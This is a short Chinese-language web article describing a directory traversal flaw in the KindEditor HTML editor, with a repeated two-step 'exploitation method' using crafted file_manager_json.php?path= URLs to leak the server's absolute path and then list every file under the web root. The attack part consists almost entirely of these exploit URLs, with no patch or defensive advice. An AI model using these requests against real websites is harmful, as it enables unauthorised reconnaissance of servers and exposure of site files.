Kindeditor遍歷目錄0DAY問題
發(fā)布時間:2015-08-13 14:59:57 作者:佚名
我要評論

KindEditor是一套開源的HTML可視化編輯器,主要用于讓用戶在網(wǎng)站上獲得所見即所得編輯效果,兼容IE、Firefox、Chrome、Safari、Opera等主流瀏覽器
KindEditor是一套開源的HTML可視化編輯器,主要用于讓用戶在網(wǎng)站上獲得所見即所得編輯效果,兼容IE、Firefox、Chrome、Safari、Opera等主流瀏覽器。 KindEditor使用JavaScript編寫,可以無縫的于Java、.NET、PHP、ASP等程序接合。 KindEditor非常適合在CMS、商城、論壇、博客、Wiki、電子郵件等互聯(lián)網(wǎng)應(yīng)用上使用,2006年7月首次發(fā)布2.0以來,KindEditor依靠出色的用戶體驗和領(lǐng)先的技術(shù)不斷擴(kuò)大編輯器市場占有率,目前在國內(nèi)已經(jīng)成為最受歡迎的編輯器之一。
利用方法:
1.http://localhost/67cms/kindeditor/php/file_manager_json.php?path=/
//path=/,爆出絕對路徑D:\AppServ\www\67cms\kindeditor\php\file_manager_json.php
2.http://localhost/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
//根據(jù)爆出的絕對路徑,修改path的值為AppServ/www/67cms/
這時將遍歷d:/AppServ/www/67cms/下的所有文件和文件名
利用方法:
1.http://localhost/67cms/kindeditor/php/file_manager_json.php?path=/
//path=/,爆出絕對路徑D:\AppServ\www\67cms\kindeditor\php\file_manager_json.php
2.http://localhost/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
//根據(jù)爆出的絕對路徑,修改path的值為AppServ/www/67cms/
這時將遍歷d:/AppServ/www/67cms/下的所有文件和文件名

相關(guān)文章
KindEditor上傳解析漏洞、列目錄、內(nèi)容漏洞
KindEditor是一套開源的HTML可視化編輯器,主要用于讓用戶在網(wǎng)站上獲得所見即所得編輯效果,兼容IE、Firefox、Chrome、Safari、Opera等主流瀏覽器,但是安全問題也不容忽視2014-07-31Kindeditor特定情況可能會導(dǎo)致全盤瀏覽的漏洞
因為例子很少,開始想了下不是他們的漏洞,后面想了下,后面沒有檢查好用戶的正常配置內(nèi)容導(dǎo)致,還是提下吧2015-08-13